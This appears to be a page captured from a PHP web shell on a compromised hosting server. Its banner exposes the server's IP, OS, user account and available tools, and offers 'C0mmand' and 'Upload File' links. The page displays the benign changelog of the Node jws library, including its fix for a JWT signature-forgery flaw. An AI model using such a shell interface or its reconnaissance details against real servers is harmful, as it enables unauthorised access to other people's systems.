|
Server IP : 92.205.26.207 / Your IP : 216.73.216.16 Web Server : Apache System : Linux 207.26.205.92.host.secureserver.net 4.18.0-553.60.1.el8_10.x86_64 #1 SMP Thu Jul 10 04:01:16 EDT 2025 x86_64 User : zikryat ( 1002) PHP Version : 8.3.23 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/zikryat/public_html/node_modules/jws/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
# Change Log All notable changes to this project will be documented in this file. ## [3.0.0] ### Changed - **BREAKING**: `jwt.verify` now requires an `algorithm` parameter, and `jws.createVerify` requires an `algorithm` option. The `"alg"` field signature headers is ignored. This mitigates a critical security flaw in the library which would allow an attacker to generate signatures with arbitrary contents that would be accepted by `jwt.verify`. See https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/ for details. ## [2.0.0] - 2015-01-30 ### Changed - **BREAKING**: Default payload encoding changed from `binary` to `utf8`. `utf8` is a is a more sensible default than `binary` because many payloads, as far as I can tell, will contain user-facing strings that could be in any language. (<code>[6b6de48]</code>) - Code reorganization, thanks [@fearphage]! (<code>[7880050]</code>) ### Added - Option in all relevant methods for `encoding`. For those few users that might be depending on a `binary` encoding of the messages, this is for them. (<code>[6b6de48]</code>) [unreleased]: https://github.com/brianloveswords/node-jws/compare/v2.0.0...HEAD [2.0.0]: https://github.com/brianloveswords/node-jws/compare/v1.0.1...v2.0.0 [7880050]: https://github.com/brianloveswords/node-jws/commit/7880050 [6b6de48]: https://github.com/brianloveswords/node-jws/commit/6b6de48 [@fearphage]: https://github.com/fearphage